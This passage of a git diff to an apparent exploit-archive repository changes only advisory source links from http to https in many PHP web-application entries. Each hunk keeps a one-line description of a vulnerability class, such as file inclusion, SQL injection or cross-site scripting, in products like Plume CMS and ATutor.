b/exploits/php/webapps/28147.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18780/info +source: https://www.securityfocus.com/bid/18780/info Plume CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28148.txt b/exploits/php/webapps/28148.txt index 5a7df01dd..d8075c11e 100644 --- a/exploits/php/webapps/28148.txt +++ b/exploits/php/webapps/28148.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18780/info +source: https://www.securityfocus.com/bid/18780/info Plume CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28149.txt b/exploits/php/webapps/28149.txt index 4571e1d66..d24c0bac7 100644 --- a/exploits/php/webapps/28149.txt +++ b/exploits/php/webapps/28149.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18780/info +source: https://www.securityfocus.com/bid/18780/info Plume CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28150.txt b/exploits/php/webapps/28150.txt index 3eab9ee53..e74cc8a92 100644 --- a/exploits/php/webapps/28150.txt +++ b/exploits/php/webapps/28150.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18788/info +source: https://www.securityfocus.com/bid/18788/info The free QBoard script is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28151.txt b/exploits/php/webapps/28151.txt index d39be360e..7fbb2a404 100644 --- a/exploits/php/webapps/28151.txt +++ b/exploits/php/webapps/28151.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18780/info +source: https://www.securityfocus.com/bid/18780/info Plume CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28152.txt b/exploits/php/webapps/28152.txt index 3159dc6cb..f02458f27 100644 --- a/exploits/php/webapps/28152.txt +++ b/exploits/php/webapps/28152.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18780/info +source: https://www.securityfocus.com/bid/18780/info Plume CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28153.txt b/exploits/php/webapps/28153.txt index 1dca012d7..4df0f4a81 100644 --- a/exploits/php/webapps/28153.txt +++ b/exploits/php/webapps/28153.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18780/info +source: https://www.securityfocus.com/bid/18780/info Plume CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28154.txt b/exploits/php/webapps/28154.txt index 74f52ec08..492fbc1ac 100644 --- a/exploits/php/webapps/28154.txt +++ b/exploits/php/webapps/28154.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18780/info +source: https://www.securityfocus.com/bid/18780/info Plume CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28155.txt b/exploits/php/webapps/28155.txt index 847cb90ee..957ebeaef 100644 --- a/exploits/php/webapps/28155.txt +++ b/exploits/php/webapps/28155.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18780/info +source: https://www.securityfocus.com/bid/18780/info Plume CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28156.txt b/exploits/php/webapps/28156.txt index 424eb9dbd..765682e81 100644 --- a/exploits/php/webapps/28156.txt +++ b/exploits/php/webapps/28156.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18780/info +source: https://www.securityfocus.com/bid/18780/info Plume CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28157.txt b/exploits/php/webapps/28157.txt index 9a145075c..618ce7c05 100644 --- a/exploits/php/webapps/28157.txt +++ b/exploits/php/webapps/28157.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18790/info +source: https://www.securityfocus.com/bid/18790/info VirtuaStore is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/28158.txt b/exploits/php/webapps/28158.txt index 184da1fec..0f20393ec 100644 --- a/exploits/php/webapps/28158.txt +++ b/exploits/php/webapps/28158.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18791/info +source: https://www.securityfocus.com/bid/18791/info QTO File Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before displaying it to users of the application. diff --git a/exploits/php/webapps/28159.txt b/exploits/php/webapps/28159.txt index 083cb9239..ad1757d42 100644 --- a/exploits/php/webapps/28159.txt +++ b/exploits/php/webapps/28159.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18792/info +source: https://www.securityfocus.com/bid/18792/info Glossaire is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28161.txt b/exploits/php/webapps/28161.txt index 9a5be86d6..9e81b2242 100644 --- a/exploits/php/webapps/28161.txt +++ b/exploits/php/webapps/28161.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18798/info +source: https://www.securityfocus.com/bid/18798/info PhpWebGallery is prone to a cross-site scripting vulnerability because it fails to sanitize input before displaying it to users of the application. diff --git a/exploits/php/webapps/28162.txt b/exploits/php/webapps/28162.txt index 8ded4ef4a..071b6864e 100644 --- a/exploits/php/webapps/28162.txt +++ b/exploits/php/webapps/28162.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18809/info +source: https://www.securityfocus.com/bid/18809/info Randshop is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28163.txt b/exploits/php/webapps/28163.txt index 48816bcab..a67ec5e54 100644 --- a/exploits/php/webapps/28163.txt +++ b/exploits/php/webapps/28163.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18819/info +source: https://www.securityfocus.com/bid/18819/info PostNuke is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before displaying it to users of the application. diff --git a/exploits/php/webapps/28166.pl b/exploits/php/webapps/28166.pl index 667ac6b6d..233c1fdd1 100755 --- a/exploits/php/webapps/28166.pl +++ b/exploits/php/webapps/28166.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18835/info +source: https://www.securityfocus.com/bid/18835/info LifeType is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28167.txt b/exploits/php/webapps/28167.txt index 5910e2536..2520846fb 100644 --- a/exploits/php/webapps/28167.txt +++ b/exploits/php/webapps/28167.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18836/info +source: https://www.securityfocus.com/bid/18836/info Invision Power Board is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/28168.txt b/exploits/php/webapps/28168.txt index 6ec8e80c4..feead3fd7 100644 --- a/exploits/php/webapps/28168.txt +++ b/exploits/php/webapps/28168.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18837/info +source: https://www.securityfocus.com/bid/18837/info Blog:CMS is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28176.txt b/exploits/php/webapps/28176.txt index d7c8ee1d3..aecfc31f6 100644 --- a/exploits/php/webapps/28176.txt +++ b/exploits/php/webapps/28176.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18857/info +source: https://www.securityfocus.com/bid/18857/info ATutor is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28177.txt b/exploits/php/webapps/28177.txt index b5d0d065b..4d3287653 100644 --- a/exploits/php/webapps/28177.txt +++ b/exploits/php/webapps/28177.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18857/info +source: https://www.securityfocus.com/bid/18857/info ATutor is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28178.txt b/exploits/php/webapps/28178.txt index 2e19fc7e9..0612b76f6 100644 --- a/exploits/php/webapps/28178.txt +++ b/exploits/php/webapps/28178.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18857/info +source: https://www.securityfocus.com/bid/18857/info ATutor is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28179.txt b/exploits/php/webapps/28179.txt index c3d9760e6..ab5aa11b5 100644 --- a/exploits/php/webapps/28179.txt +++ b/exploits/php/webapps/28179.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18857/info +source: https://www.securityfocus.com/bid/18857/info ATutor is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28180.txt b/exploits/php/webapps/28180.txt index 4d706cd45..b54cede98 100644 --- a/exploits/php/webapps/28180.txt +++ b/exploits/php/webapps/28180.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18857/info +source: https://www.securityfocus.com/bid/18857/info ATutor is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28190.txt b/exploits/php/webapps/28190.txt index 8c9f32e81..e7503e1b1 100644 --- a/exploits/php/webapps/28190.txt +++ b/exploits/php/webapps/28190.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18876/info +source: https://www.securityfocus.com/bid/18876/info ExtCalendar is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28192.txt b/exploits/php/webapps/28192.txt index 9061cf844..c510eece1 100644 --- a/exploits/php/webapps/28192.txt +++ b/exploits/php/webapps/28192.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18898/info +source: https://www.securityfocus.com/bid/18898/info ATutor is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28195.txt b/exploits/php/webapps/28195.txt index d453b3c60..0333f05a9 100644 --- a/exploits/php/webapps/28195.txt +++ b/exploits/php/webapps/28195.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18901/info +source: https://www.securityfocus.com/bid/18901/info RW::Download is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28199.txt b/exploits/php/webapps/28199.txt index 746e7ba79..4c3e77de3 100644 --- a/exploits/php/webapps/28199.txt +++ b/exploits/php/webapps/28199.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18914/info +source: https://www.securityfocus.com/bid/18914/info phpBB for Mambo is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28200.txt b/exploits/php/webapps/28200.txt index 0236044fe..ee8696fb7 100644 --- a/exploits/php/webapps/28200.txt +++ b/exploits/php/webapps/28200.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18925/info +source: https://www.securityfocus.com/bid/18925/info Farsinews is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28201.txt b/exploits/php/webapps/28201.txt index 324cf6fcb..8a8c601d7 100644 --- a/exploits/php/webapps/28201.txt +++ b/exploits/php/webapps/28201.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18928/info +source: https://www.securityfocus.com/bid/18928/info Graffiti Forums is prone to an SQL-injection vulnerability. diff --git a/exploits/php/webapps/28204.txt b/exploits/php/webapps/28204.txt index 02bb48f22..3db4b14e8 100644 --- a/exploits/php/webapps/28204.txt +++ b/exploits/php/webapps/28204.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18934/info +source: https://www.securityfocus.com/bid/18934/info SaPHPLesson is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28205.txt b/exploits/php/webapps/28205.txt index 67ee0dcd2..bc7fa5810 100644 --- a/exploits/php/webapps/28205.txt +++ b/exploits/php/webapps/28205.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18936/info +source: https://www.securityfocus.com/bid/18936/info FlexWATCH Network Camera is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28206.txt b/exploits/php/webapps/28206.txt index 16d56ad50..6b57bbee0 100644 --- a/exploits/php/webapps/28206.txt +++ b/exploits/php/webapps/28206.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18942/info +source: https://www.securityfocus.com/bid/18942/info Fantastic GuestBook is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/28211.txt b/exploits/php/webapps/28211.txt index 3e8b7e1de..3dc2fa344 100644 --- a/exploits/php/webapps/28211.txt +++ b/exploits/php/webapps/28211.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18956/info +source: https://www.securityfocus.com/bid/18956/info Lazarus Guestbook is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28212.txt b/exploits/php/webapps/28212.txt index e25d9f4e1..302514146 100644 --- a/exploits/php/webapps/28212.txt +++ b/exploits/php/webapps/28212.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18956/info +source: https://www.securityfocus.com/bid/18956/info Lazarus Guestbook is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28214.txt b/exploits/php/webapps/28214.txt index 38d318a98..beb334a03 100644 --- a/exploits/php/webapps/28214.txt +++ b/exploits/php/webapps/28214.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18964/info +source: https://www.securityfocus.com/bid/18964/info Photocycle is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28215.txt b/exploits/php/webapps/28215.txt index 2fca48b79..0b0c58970 100644 --- a/exploits/php/webapps/28215.txt +++ b/exploits/php/webapps/28215.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18965/info +source: https://www.securityfocus.com/bid/18965/info PHP Event Calendar is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28216.txt b/exploits/php/webapps/28216.txt index 6d5ed0196..cf0a01a26 100644 --- a/exploits/php/webapps/28216.txt +++ b/exploits/php/webapps/28216.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18966/info +source: https://www.securityfocus.com/bid/18966/info FlatNuke is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28217.txt b/exploits/php/webapps/28217.txt index a3bea3d27..e1eebeb10 100644 --- a/exploits/php/webapps/28217.txt +++ b/exploits/php/webapps/28217.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18967/info +source: https://www.securityfocus.com/bid/18967/info Forum 5 is prone to a local file-include vulnerability. diff --git a/exploits/php/webapps/28219.txt b/exploits/php/webapps/28219.txt index 3b7cbff3e..956ebad86 100644 --- a/exploits/php/webapps/28219.txt +++ b/exploits/php/webapps/28219.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18970/info +source: https://www.securityfocus.com/bid/18970/info Koobi Pro prone to a cross-site scripting issue and an SQL-injection issue because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28223.txt b/exploits/php/webapps/28223.txt index f9f8c9590..672d56b6b 100644 --- a/exploits/php/webapps/28223.txt +++ b/exploits/php/webapps/28223.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18990/info +source: https://www.securityfocus.com/bid/18990/info SubberZ[Lite] is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28229.txt b/exploits/php/webapps/28229.txt index b273a9ad3..430567023 100644 --- a/exploits/php/webapps/28229.txt +++ b/exploits/php/webapps/28229.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19002/info +source: https://www.securityfocus.com/bid/19002/info VisNetic Mail Server is prone to multiple local file-include vulnerabilities and a remote file includes vulnerability. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28231.txt b/exploits/php/webapps/28231.txt index ae0599b01..9ce4520a8 100644 --- a/exploits/php/webapps/28231.txt +++ b/exploits/php/webapps/28231.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19014/info +source: https://www.securityfocus.com/bid/19014/info ListMessenger is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28233.txt b/exploits/php/webapps/28233.txt index 4d9cd62b9..e7602976d 100644 --- a/exploits/php/webapps/28233.txt +++ b/exploits/php/webapps/28233.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19027/info +source: https://www.securityfocus.com/bid/19027/info The Calendar module for Mambo is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28247.txt b/exploits/php/webapps/28247.txt index be67c3650..d69ead087 100644 --- a/exploits/php/webapps/28247.txt +++ b/exploits/php/webapps/28247.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19083/info +source: https://www.securityfocus.com/bid/19083/info PHPLinkExchange is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28248.txt b/exploits/php/webapps/28248.txt index fd7093fea..6aebbe32a 100644 --- a/exploits/php/webapps/28248.txt +++ b/exploits/php/webapps/28248.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19084/info +source: https://www.securityfocus.com/bid/19084/info PHPHostBot is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28249.txt b/exploits/php/webapps/28249.txt index 12b1c2218..d12889dbe 100644 --- a/exploits/php/webapps/28249.txt +++ b/exploits/php/webapps/28249.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19093/info +source: https://www.securityfocus.com/bid/19093/info GeodesicSolutions products are prone to multiple SQL-injection vulnerabilities because the applications fail to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28250.txt b/exploits/php/webapps/28250.txt index fa3c51a5c..709455880 100644 --- a/exploits/php/webapps/28250.txt +++ b/exploits/php/webapps/28250.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19093/info +source: https://www.securityfocus.com/bid/19093/info GeodesicSolutions products are prone to multiple SQL-injection vulnerabilities because the applications fail to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28251.txt b/exploits/php/webapps/28251.txt index 9d4753682..b63513d15 100644 --- a/exploits/php/webapps/28251.txt +++ b/exploits/php/webapps/28251.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19095/info +source: https://www.securityfocus.com/bid/19095/info MiniBB is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28253.txt b/exploits/php/webapps/28253.txt index 6f2af823f..629e21fff 100644 --- a/exploits/php/webapps/28253.txt +++ b/exploits/php/webapps/28253.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19105/info +source: https://www.securityfocus.com/bid/19105/info Advanced Poll is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input to the application. diff --git a/exploits/php/webapps/28255.txt b/exploits/php/webapps/28255.txt index 43838c116..0b3aeece6 100644 --- a/exploits/php/webapps/28255.txt +++ b/exploits/php/webapps/28255.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19107/info +source: https://www.securityfocus.com/bid/19107/info Chameleon LE is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28260.txt b/exploits/php/webapps/28260.txt index 3c7ebce08..459f2001f 100644 --- a/exploits/php/webapps/28260.txt +++ b/exploits/php/webapps/28260.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19127/info +source: https://www.securityfocus.com/bid/19127/info Vanilla is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28261.txt b/exploits/php/webapps/28261.txt index 63832da22..8cfcf1947 100644 --- a/exploits/php/webapps/28261.txt +++ b/exploits/php/webapps/28261.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19128/info +source: https://www.securityfocus.com/bid/19128/info Multiple Rad Scripts products are prone to an authentication-bypass vulnerability. These issues occur because the applications fail to prevent an attacker from accessing admin scripts directly without requiring authentication. diff --git a/exploits/php/webapps/28262.txt b/exploits/php/webapps/28262.txt index e989672af..4432ab282 100644 --- a/exploits/php/webapps/28262.txt +++ b/exploits/php/webapps/28262.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19129/info +source: https://www.securityfocus.com/bid/19129/info MusicBox is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28264.txt b/exploits/php/webapps/28264.txt index 0390e4b30..852760817 100644 --- a/exploits/php/webapps/28264.txt +++ b/exploits/php/webapps/28264.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19138/info +source: https://www.securityfocus.com/bid/19138/info Prince Clan Chess Club for Mambo is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28267.txt b/exploits/php/webapps/28267.txt index c66bcad86..fd6216abd 100644 --- a/exploits/php/webapps/28267.txt +++ b/exploits/php/webapps/28267.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19149/info +source: https://www.securityfocus.com/bid/19149/info LinksCaffe is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28268.txt b/exploits/php/webapps/28268.txt index 9d5671a9d..bd8884962 100644 --- a/exploits/php/webapps/28268.txt +++ b/exploits/php/webapps/28268.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19149/info +source: https://www.securityfocus.com/bid/19149/info LinksCaffe is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28269.txt b/exploits/php/webapps/28269.txt index 48d54f152..8be9527b1 100644 --- a/exploits/php/webapps/28269.txt +++ b/exploits/php/webapps/28269.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19149/info +source: https://www.securityfocus.com/bid/19149/info LinksCaffe is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28270.txt b/exploits/php/webapps/28270.txt index 1b2cd9ead..4a8ca4622 100644 --- a/exploits/php/webapps/28270.txt +++ b/exploits/php/webapps/28270.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19149/info +source: https://www.securityfocus.com/bid/19149/info LinksCaffe is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28273.txt b/exploits/php/webapps/28273.txt index aebb1eba3..d8397602c 100644 --- a/exploits/php/webapps/28273.txt +++ b/exploits/php/webapps/28273.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19151/info +source: https://www.securityfocus.com/bid/19151/info Savant2 is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28274.txt b/exploits/php/webapps/28274.txt index 01b2a0abe..320297cbd 100644 --- a/exploits/php/webapps/28274.txt +++ b/exploits/php/webapps/28274.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19158/info +source: https://www.securityfocus.com/bid/19158/info PHP Pro Bid is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28275.txt b/exploits/php/webapps/28275.txt index 01903e805..fc4c2e8bb 100644 --- a/exploits/php/webapps/28275.txt +++ b/exploits/php/webapps/28275.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19158/info +source: https://www.securityfocus.com/bid/19158/info PHP Pro Bid is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28276.txt b/exploits/php/webapps/28276.txt index 50c27fc6b..004e63f2b 100644 --- a/exploits/php/webapps/28276.txt +++ b/exploits/php/webapps/28276.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19158/info +source: https://www.securityfocus.com/bid/19158/info PHP Pro Bid is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28280.txt b/exploits/php/webapps/28280.txt index d030c20df..64bb7bd21 100644 --- a/exploits/php/webapps/28280.txt +++ b/exploits/php/webapps/28280.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19177/info +source: https://www.securityfocus.com/bid/19177/info WWWThreads is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28281.txt b/exploits/php/webapps/28281.txt index 36805a3bf..e48d1974a 100644 --- a/exploits/php/webapps/28281.txt +++ b/exploits/php/webapps/28281.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19179/info +source: https://www.securityfocus.com/bid/19179/info PHPBB-Auction is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28282.txt b/exploits/php/webapps/28282.txt index dd3f5c338..48af9e520 100644 --- a/exploits/php/webapps/28282.txt +++ b/exploits/php/webapps/28282.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19179/info +source: https://www.securityfocus.com/bid/19179/info PHPBB-Auction is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28289.txt b/exploits/php/webapps/28289.txt index 4df72d43b..c18a8d287 100644 --- a/exploits/php/webapps/28289.txt +++ b/exploits/php/webapps/28289.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19191/info +source: https://www.securityfocus.com/bid/19191/info Bosdates is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28291.txt b/exploits/php/webapps/28291.txt index 88649db39..5b6f12848 100644 --- a/exploits/php/webapps/28291.txt +++ b/exploits/php/webapps/28291.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19195/info +source: https://www.securityfocus.com/bid/19195/info MyBulletinBoard is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28292.txt b/exploits/php/webapps/28292.txt index 23cee6181..7e7e2aa61 100644 --- a/exploits/php/webapps/28292.txt +++ b/exploits/php/webapps/28292.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19196/info +source: https://www.securityfocus.com/bid/19196/info GeoClassifieds Enterprise is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28294.txt b/exploits/php/webapps/28294.txt index 71f74b2b2..3843fa5f2 100644 --- a/exploits/php/webapps/28294.txt +++ b/exploits/php/webapps/28294.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19208/info +source: https://www.securityfocus.com/bid/19208/info PHPNuke INP is prone to a cross-site scripting vulnerability that affects the 'modules.php' script. diff --git a/exploits/php/webapps/28295.txt b/exploits/php/webapps/28295.txt index 8f6cb47ea..4b8197ce0 100644 --- a/exploits/php/webapps/28295.txt +++ b/exploits/php/webapps/28295.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19209/info +source: https://www.securityfocus.com/bid/19209/info JD-WordPress for Joomla is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28296.txt b/exploits/php/webapps/28296.txt index 944f15948..e37b8a646 100644 --- a/exploits/php/webapps/28296.txt +++ b/exploits/php/webapps/28296.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19209/info +source: https://www.securityfocus.com/bid/19209/info JD-WordPress for Joomla is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28297.txt b/exploits/php/webapps/28297.txt index b00bb39f6..324f95aaa 100644 --- a/exploits/php/webapps/28297.txt +++ b/exploits/php/webapps/28297.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19209/info +source: https://www.securityfocus.com/bid/19209/info JD-WordPress for Joomla is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git 